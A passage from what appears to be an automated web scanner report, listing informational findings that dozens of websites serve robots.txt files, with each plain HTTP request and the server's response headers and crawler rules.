Last-Modified: Fri, 29 Apr 2011 20:41:40 GMT
ETag: "60568-324-b36aa900"
Accept-Ranges: bytes
Content-Length: 804
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

Sitemap:    http://www.jessicasimpsoncollection.com/sitemap.xml
User-Agent:    *
Disallow:    /conversion/
Allow:    /cgi-bin/
Disallow:    /test/
Disallow:    /content/
Disallow:    /cam99/
Disallow:    /vc/
Disallo
...[SNIP]...

27.920. http://www.jeuxvideo.fr/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jeuxvideo.fr
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jeuxvideo.fr

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 23 Sep 2010 11:21:36 GMT
ETag: "40-490eb770e9000"
Vary: Accept-Encoding
Content-Type: text/plain
X-Cache-IP: 172.16.1.28
X-Powered-By: Cobol Server 2.0
X-Cacheable: YES
Content-Length: 64
Date: Wed, 04 May 2011 04:01:11 GMT
Age: 32
Connection: close

User-agent: *
Disallow: /api/
Disallow: /divers/credit_photo.php

27.921. http://www.jittery.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jittery.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jittery.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Sat, 30 Apr 2011 10:25:14 GMT
Accept-Ranges: bytes
ETag: "18f6b2e4207cc1:0"
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 03:20:08 GMT
Connection: close
Content-Length: 148

User-agent: *
Sitemap: http://www.jittery.com/sitemap.xml
Disallow: /sites/
Disallow: /siteindex/
Disallow: /business/
Disallow: /companyindex/

27.922. http://www.jizzthis.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jizzthis.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jizzthis.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:40:56 GMT
Server: Apache/2
Last-Modified: Wed, 02 Mar 2011 15:38:02 GMT
ETag: "59a0d20-45-49d81b2be4a80"
Accept-Ranges: bytes
Content-Length: 69
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /webmaster/
Disallow: /rotator/
Allow: /

27.923. http://www.jkrowling.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jkrowling.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jkrowling.com

Response

HTTP/1.0 200 OK
Content-Length: 116
Content-Type: text/plain
Content-Location: http://origin.jkrowling.com/robots.txt
Last-Modified: Fri, 27 Apr 2007 14:37:52 GMT
Accept-Ranges: bytes
ETag: "32bc12a3d988c71:c61"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:35:15 GMT
Connection: close

User-agent: *
Disallow: /a9d2hary
Disallow: /ca1end6er
Disallow: /cfm
Disallow: /f7b3qash
Disallow: /w2o6pard

27.924. http://www.jlconline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jlconline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jlconline.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.27 (Unix) mod_ssl/2.8.14 OpenSSL/0.9.6g
Last-Modified: Mon, 24 Mar 2008 18:01:00 GMT
ETag: "7ec26-485-47e7ec5c"
Accept-Ranges: bytes
Content-Length: 1157
Content-Type: text/plain
Date: Wed, 04 May 2011 03:21:30 GMT
Connection: close

User-agent: Slurp
Crawl-delay: 30
Disallow: /epages/
Disallow: /sportsplace.storefront/
Disallow: /trainingstore.storefront/
Disallow: /golfstore.storefront/
Disallow: /jlcstage.storefront/

User-agen
...[SNIP]...

27.925. http://www.job-interview-site.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.job-interview-site.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.job-interview-site.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:49:45 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Vary: Cookie
X-Pingback: http://www.job-interview-site.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.job-interview-site.com/sitemap.xml

27.926. http://www.joshgroban.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joshgroban.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.joshgroban.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:16:56 GMT
Server: Apache
Vary: Host
Last-Modified: Wed, 14 Jul 2010 20:02:37 GMT
Accept-Ranges: bytes
Content-Length: 1812
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 04:16:56 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.927. http://www.journal-news.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.journal-news.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.journal-news.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 03 Jun 2009 14:52:27 GMT
ETag: "193a958-d3-46b72cecfa0c0"
Accept-Ranges: bytes
Content-Length: 211
Content-Type: text/plain; charset=UTF-8
Date: Wed, 04 May 2011 02:56:49 GMT
Connection: close

##ACAP version=1.0

user-agent: *
allow: /
Disallow: /*printArticle=y*

ACAP-crawler: *
# User-agent: *
ACAP-allow-crawl: /
# Allow: /
Sitemap: http://www.journal-news.com/template/component/sitemap/s
...[SNIP]...

27.928. http://www.joydesk.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joydesk.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.joydesk.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:09:12 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Thu, 15 Apr 2010 16:23:52 GMT
ETag: "61210-cc-48448eb989600"
Accept-Ranges: bytes
Content-Length: 204
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

27.929. http://www.juilliard.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.juilliard.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.juilliard.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:27:03 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch
Last-Modified: Fri, 11 Feb 2011 15:32:35 GMT
ETag: "13c555-58-49c0368448ac0"
Accept-Ranges: bytes
Content-Length: 88
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
Disallow: /asp/
Disallow: /emergency-alert/
Disallow: /new/

27.930. http://www.jumeirah.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jumeirah.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jumeirah.com

Response

HTTP/1.1 200 OK
Set-Cookie: AlteonP=ad0a051bad0a5b9cbaeeba89; path=/
Content-Length: 254
Content-Type: text/plain
Content-Location: http://www.jumeirah.com/robots.txt
Last-Modified: Sun, 12 Apr 2009 13:51:00 GMT
Accept-Ranges: bytes
ETag: "03a40b675bbc91:1344"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:33:30 GMT
Connection: close

User-agent: *
Disallow: /*.rotate_config$
Disallow: /*.gallery_config$
Disallow: /*.activities_config$
Disallow: /*.resorts_config$
Disallow: /*.sd_video_config$
Disallow: /*.flv$
Disallow: /*.
...[SNIP]...

27.931. http://www.jumpzoneparty.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jumpzoneparty.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jumpzoneparty.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:44:33 GMT
Server: Apache
Last-Modified: Tue, 04 Jan 2011 19:40:24 GMT
ETag: "d50910-17-4990a708f3a00"
Accept-Ranges: bytes
Content-Length: 23
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.932. http://www.justparts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.justparts.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.justparts.com

Response

HTTP/1.1 200 OK
Content-Length: 504
Content-Type: text/plain
Content-Location: http://www.justparts.com/robots.txt
Last-Modified: Fri, 12 Mar 2010 01:16:00 GMT
Accept-Ranges: bytes
ETag: "048519381c1ca1:5e9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:59:30 GMT
Connection: close

User-Agent: *
Sitemap: http://www.justparts.com/Sitemap/Sitemap.xml
Disallow: /Administration/
Disallow: /App_Browsers/
Disallow: /App_Code/
Disallow: /App_Data/
Disallow: /App_WebReferences/
D
...[SNIP]...

27.933. http://www.justskins.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.justskins.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.justskins.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:38:07 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Tue, 03 Apr 2007 19:10:13 GMT
ETag: "3a0a194-af-42d3a16570f40"
Accept-Ranges: bytes
Content-Length: 175
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /page/
Disallow: /pages/
Disallow: /feed/
Disallow: /feed
Disallow: /author/
Disallow: /category/
Disallow: /tag/
Disallow: /tracker
Disallow: /wpdemo/

27.934. http://www.jwmatch.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jwmatch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jwmatch.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:36:08 GMT
Server: Apache
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google
Disallow: /

User-agent: Googlebot-Mobile
Disallow: /

User-agent: *
Disallow: /ads/
Disallow: /s/a/
Disallow: /s/admin/
Disallow: /s/afw/
Disallow: /s/find/block.php

...[SNIP]...

27.935. http://www.jwu.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jwu.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jwu.edu

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 03 Nov 2010 16:39:17 GMT
Accept-Ranges: bytes
ETag: "57f88ca8757bcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:53:20 GMT
Connection: close
Content-Length: 200

User-agent: Googlebot-Image
Disallow: /

User-agent: *
Disallow: /images/
Disallow: /css/
Disallow: /App_Code/
Disallow: /App_GlobalResources/
Disallow: /App_WebReferences/
Disallow: /images/

27.936. http://www.k1speed.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.k1speed.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.k1speed.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:39:16 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 19 Apr 2011 17:33:15 GMT
ETag: "659405-1aa-4a148e72c4cc0"
Accept-Ranges: bytes
Content-Length: 426
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins
Disallow: /wp-content/cache
Disallow: /wp-content/themes/classic
Disallow: /wp-content/themes/
...[SNIP]...

27.937. http://www.kansas.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kansas.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kansas.gov

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:53:08 GMT
Server: Apache
Last-Modified: Wed, 30 Mar 2011 14:31:12 GMT
ETag: "468ae-38-7490c00"
Accept-Ranges: bytes
Content-Length: 56
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/
Disallow: /amber.html

27.938. http://www.kaplancollege.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kaplancollege.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kaplancollege.com

Response

HTTP/1.1 200 OK
Content-Length: 71
Content-Type: text/plain
Content-Location: http://www.kaplancollege.com/robots.txt
Last-Modified: Fri, 06 Aug 2010 18:49:27 GMT
Accept-Ranges: bytes
ETag: "cc5a64189835cb1:9567"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:02:30 GMT
Connection: close

User-agent: *
Disallow: /Documents/Student_Consumer_Information.aspx

27.939. http://www.kawasakipartshouse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kawasakipartshouse.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kawasakipartshouse.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Thu, 20 Mar 2008 13:51:37 GMT
Accept-Ranges: bytes
ETag: "f88e3684918ac81:62d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:18:09 GMT
Connection: close

User-agent: *

Disallow:

27.940. http://www.kaz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kaz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kaz.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:55:15 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 28 Apr 2011 19:58:13 GMT
ETag: "182091b-17-4a1fffa2f9f40"
Accept-Ranges: bytes
Content-Length: 23
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Allow: /

27.941. http://www.kcbd.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kcbd.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kcbd.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS39
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/plain
Last-Modified: Wed, 04 Feb 2009 01:59:54 GMT
ETag: "60dab9456c86c91:9bf"
Cteonnt-Length: 818
Expires: Wed, 04 May 2011 00:41:19 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 00:41:19 GMT
Content-Length: 818
Connection: close

# Please contact us for more information or permission to index deeper
# info@worldnow.com

User-agent: *

Disallow: /ads/
Disallow: /global/tools/
Disallow: /global/interfaces/
Disallow: /glo
...[SNIP]...

27.942. http://www.kcoy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kcoy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kcoy.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS36
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/plain
Last-Modified: Wed, 04 Feb 2009 01:59:54 GMT
ETag: "60dab9456c86c91:9f2"
Cteonnt-Length: 818
Expires: Wed, 04 May 2011 02:53:14 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 02:53:14 GMT
Content-Length: 818
Connection: close

# Please contact us for more information or permission to index deeper
# info@worldnow.com

User-agent: *

Disallow: /ads/
Disallow: /global/tools/
Disallow: /global/interfaces/
Disallow: /glo
...[SNIP]...

27.943. http://www.keegy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.keegy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.keegy.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:45:16 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 07 Apr 2011 15:51:13 GMT
ETag: "2c70269-110-4a056142d7e40"
Accept-Ranges: bytes
Content-Length: 272
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Googlebot
Disallow: /*/?rss=1
Disallow: /*/?modo=rss
Disallow: /*/header.php

User-agent: IRLbot
Disallow: /

User-agent: Slurp
Crawl-delay: 60
Disallow: /*/?rss=1
Disallow: /*/?modo=rss
D
...[SNIP]...

27.944. http://www.keepshooting.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.keepshooting.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.keepshooting.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:49:26 GMT
Server: Apache
Last-Modified: Sun, 01 May 2011 23:54:46 GMT
ETag: "fdb67-499-4dbdf2c6"
Accept-Ranges: bytes
Content-Length: 1177
Connection: close
Content-Type: text/plain

Crawlers Setup
User-agent: *

# Allowable Index
Allow: /*?p=
Allow: /catalog/seo_sitemap/category/

# Directories
Disallow: /404/
Disallow: /app/
Disallow: /cgi-bin/
Disallow: /downloader/
Disallow: /
...[SNIP]...

27.945. http://www.kelolandautomall.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kelolandautomall.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kelolandautomall.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 15 Jul 2008 19:19:33 GMT
Accept-Ranges: bytes
ETag: "80102bb6afe6c81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:07:27 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

27.946. http://www.kentuckysportsradio.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kentuckysportsradio.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kentuckysportsradio.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:25:11 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 28 Aug 2009 19:58:54 GMT
ETag: "92e57d-1c2-1d1d3b80"
Accept-Ranges: bytes
Content-Length: 450
Vary: Accept-Encoding
Cache-Control: max-age=172800, proxy-revalidate
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content
Disallow: /tag
Disallow: /author
Disallow: /wget/
Disallow: /httpd/
Disallow: /i/
Disallow: /f/
Disall
...[SNIP]...

27.947. http://www.keyhints.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.keyhints.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.keyhints.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:51:17 GMT
Server: Apache
Last-Modified: Wed, 10 Feb 2010 09:24:33 GMT
ETag: "2509c54-251-47f3b9a28b640"
Accept-Ranges: bytes
Content-Length: 593
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

User-Agent: BecomeBot
Disallow: /

User-Agent: MJ12bot
Crawl-Delay: 20

User-agent: HTTrack 3.0
Disallow: /

User-agent: BecomeBot
Disallow: /

User-Agent: YodaoBot
Disallow
...[SNIP]...

27.948. http://www.keyrow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.keyrow.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.keyrow.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:05:55 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 23 Feb 2010 15:08:28 GMT
ETag: "10da41f-37-ec09b300"
Accept-Ranges: bytes
Content-Length: 55
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /compare/
Disallow: /history/

27.949. http://www.kfyi.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kfyi.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kfyi.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 29 Apr 2011 02:16:00 GMT
Content-Type: text/plain
Content-Length: 275
X-Varnish: 4235658830 4235590191
X-Cache-Server: varnish03
Expires: Wed, 04 May 2011 00:52:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 00:52:08 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /cc-common/
Disallow: /jacor-common/
Disallow: /iplaylist/
Disallow: /admin/
Disallow: /timages/
Disallow: /_template/
Di
...[SNIP]...

27.950. http://www.khow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.khow.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.khow.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 29 Apr 2011 02:16:00 GMT
Content-Type: text/plain
Content-Length: 275
X-Varnish: 4240384905
X-Cache-Server: varnish03
Expires: Wed, 04 May 2011 03:18:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 03:18:31 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /cc-common/
Disallow: /jacor-common/
Disallow: /iplaylist/
Disallow: /admin/
Disallow: /timages/
Disallow: /_template/
Di
...[SNIP]...

27.951. http://www.kickassfreeclips.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kickassfreeclips.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kickassfreeclips.com

Response

HTTP/1.1 200 OK
Content-Length: 103
Content-Type: text/plain
Last-Modified: Fri, 11 Feb 2011 07:11:06 GMT
Accept-Ranges: bytes
ETag: "0e17ad9bac9cb1:425"
Server: Microsoft-IIS/6.0
Date: Wed, 04 May 2011 04:12:23 GMT
Connection: close

User-agent: *
Disallow: /inquiry.html
Disallow: /partner
Disallow: /tracking
Disallow: /behavioural

27.952. http://www.kidscamps.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kidscamps.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kidscamps.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:18:35 GMT
Server: Apache
Last-Modified: Mon, 10 Nov 2008 18:30:11 GMT
ETag: "18d1c53-ab-45b59f40492c0"
Accept-Ranges: bytes
Content-Length: 171
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# Disallow all crawlers access to certain pages.

User-agent: *
Disallow: /cgi-bin/imagemaps
Disallow: /cgi-bin/kids-chat-all2.cgi
Disallow: /cgi-bin/kids-chat-all2.cgi/


27.953. http://www.kimt.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kimt.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kimt.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:09:30 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n31 ( iad-agg-n34), rf-ht iad-agg-n34 ( origin)
ETag: "06517a83133ca1:0"
Cache-Control: max-age=120
Expires: Wed, 04 May 2011 01:11:31 GMT
Age: 0
Content-Length: 93
Content-Type: text/plain
Last-Modified: Fri, 11 Sep 2009 22:46:10 GMT
Connection: close

User-agent: *
Disallow:/ScriptResource.axd
Disallow:/WebResource.axd
Sitemap:/sitemap.ashx

27.954. http://www.kingpay--day.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kingpay--day.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kingpay--day.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:45:52 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.5 mod_ssl/2.8.31 OpenSSL/0.9.8q
Last-Modified: Fri, 14 Jan 2011 20:05:41 GMT
ETag: "17d9f25-e7-4d30ac95"
Accept-Ranges: bytes
Content-Length: 231
Connection: close
Content-Type: text/plain

User-Agent: *

Disallow: /_old/
Disallow: /inc/
Disallow: /includes/
Disallow: /privacy/
Disallow: /terms/
Disallow: /unsub/

Noindex: /_old/
Noindex: /inc/
Noindex: /includes/
Noindex: /privacy/
Noin
...[SNIP]...

27.955. http://www.kirtlandfcu.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kirtlandfcu.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kirtlandfcu.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:48:28 GMT
Server: Apache
Last-Modified: Thu, 11 Jun 2009 01:45:27 GMT
ETag: "82073d-19e-46c08bf11c438"
Accept-Ranges: bytes
Content-Length: 414
Connection: close
Content-Type: text/plain

# robots.txt for http://www.kirtlandfcu.org/
# robots.txt for http://www.kirtlandfcu.com/
# robots.txt for http://www.kirtlandfcu.net/
# robots.txt for http://www.kirtlandfcu.coop/

User-agent: *
Disa
...[SNIP]...

27.956. http://www.kiss957.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kiss957.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kiss957.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 29 Apr 2011 02:16:00 GMT
Content-Type: text/plain
Content-Length: 275
X-Varnish: 4238305917 4238231776
X-Cache-Server: varnish03
Expires: Wed, 04 May 2011 02:09:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 02:09:51 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /cc-common/
Disallow: /jacor-common/
Disallow: /iplaylist/
Disallow: /admin/
Disallow: /timages/
Disallow: /_template/
Di
...[SNIP]...

27.957. http://www.kitchenlink.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kitchenlink.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kitchenlink.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:07:19 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.1304471239649158; path=/
Last-Modified: Fri, 01 Apr 2011 02:44:33 GMT
ETag: "5825a-185-49fd263ca6640"
Accept-Ranges: bytes
Content-Length: 389
